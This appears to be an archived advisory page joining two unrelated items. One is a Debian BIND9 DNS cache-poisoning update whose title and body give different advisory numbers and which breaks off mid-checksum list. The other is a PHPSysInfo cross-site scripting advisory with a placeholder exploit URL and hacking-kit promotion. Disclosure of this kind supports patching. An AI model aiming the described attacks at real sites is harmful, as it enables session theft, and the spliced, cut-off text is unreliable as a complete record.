Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[SECURITY] [DSA 1342-2] New bind9 packages fix DNS cache poisoning
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1341-2[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 25th, 2007 http://www.debian.org/security/faq - -- Package: bind9 Vulnerability : design error Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-2926 This update provides fixed packages for the oldstable distribution (sarge). For reference the original advisory text: Amit Klein discovered that the BIND name server generates predictable DNS query IDs, which may lead to cache poisoning attacks. For the oldstable distribution (sarge) this problem has been fixed in version 9.2.4-1sarge3. An update for mips, powerpc and hppa is not yet available, they will be released soon. For the stable distribution (etch) this problem has been fixed in version 9.3.4-2etch1. An update for mips is not yet available, it will be released soon. For the unstable distribution (sid) this problem will be fixed soon. We recommend that you upgrade your BIND packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3.dsc Size/MD5 checksum: 741 1fa2bc8b46a0411cd491c0473105a342 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3.diff.gz Size/MD5 checksum: 101841 7adc3b3d1c7c87908a73e7d2456985bb http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4.orig.tar.gz Size/MD5 checksum: 4564219 2ccbddbab59aedd6b8711b628b5472bd Architecture independent components: http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.2.4-1sarge3_all.deb Size/MD5 checksum: 156958 0340dcd085472e06ec9dad363f80ebeb Alpha architecture: http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_alpha.deb Size/MD5 checksum: 308078 52d70058f6114eece5f5429dd774fef4 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_alpha.deb Size/MD5 checksum:96950 e057773683872381ec4eff92b14ffcf6 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_alpha.deb Size/MD5 checksum: 169214 c8153e9d86913b5a6c0778b4d73fe4b4 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_alpha.deb Size/MD5 checksum: 1314552 287a71bed4089bb89edd55f6cb27b62b http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_alpha.deb Size/MD5 checksum: 523154 6bb71bf02b9d4ef3931745364a97cc19 http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_alpha.deb Size/MD5 checksum: 174190 cc8e2d01bd5abac2cb92b3c9e7962c44 http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_alpha.deb Size/MD5 checksum:79570 5ab2753f2227cccf90a59c24bb1eb9c0 http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_alpha.deb Size/MD5 checksum:94594 136cd50cd8fbc6d9073693938f275d0a http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_alpha.deb Size/MD5 checksum:97340 99b0751983bf6eef090692e133d0d519 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_alpha.deb Size/MD5 checksum: 199658 7cfc1d3c2ea61adb79dddb1f1568c907 AMD64 architecture: http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_amd64.deb Size/MD5 checksum: 288568 5a5f821c4dfe9e919750ec7877223451 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_amd64.deb Size/MD5 checksum:95946 95faedc2186f40293c46821da0d2ffea http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_amd64.deb Size/MD5 checksum: 165168 a9bdb7b12d44748be590bf6292b18aba http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_amd64.deb Size/MD5 checksum: 1014760 0f682e95f084eff609e65adde4439164 http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_amd64.deb Size/MD5 checksum: 490234 3192c3d956d3df8c51e588c45016b0f3 http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_amd64.deb Size/MD5 checksum:
PHPSysInfo Index.php Cross Site Scripting
[HSC] PHPSysInfo Index.php Cross Site Scripting PhpSysInfo is a PHP script that displays information about the host being accessed. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Hackers Center Security Group (http://www.hackerscenter.com) Credit: Doz Class: Input Validation Error Remote: Yes Local: N/A Product: PHPSysInfo Version: phpSysInfo-2.5.4 *Other version are be vulrnable. Vendor: http://phpsysinfo.sourceforge.net/ Exploit is not needed, Attackers can exploit these issues via a web client. Exploit: http://www.Site.com/phpsysinfo-path/index.php/XSS Only becoming a hacker you can stop a hacker. Were can you learn with out having to pay thousands!- http://kit.hackerscenter.com - The most comprehensive security pack you will ever find on the net!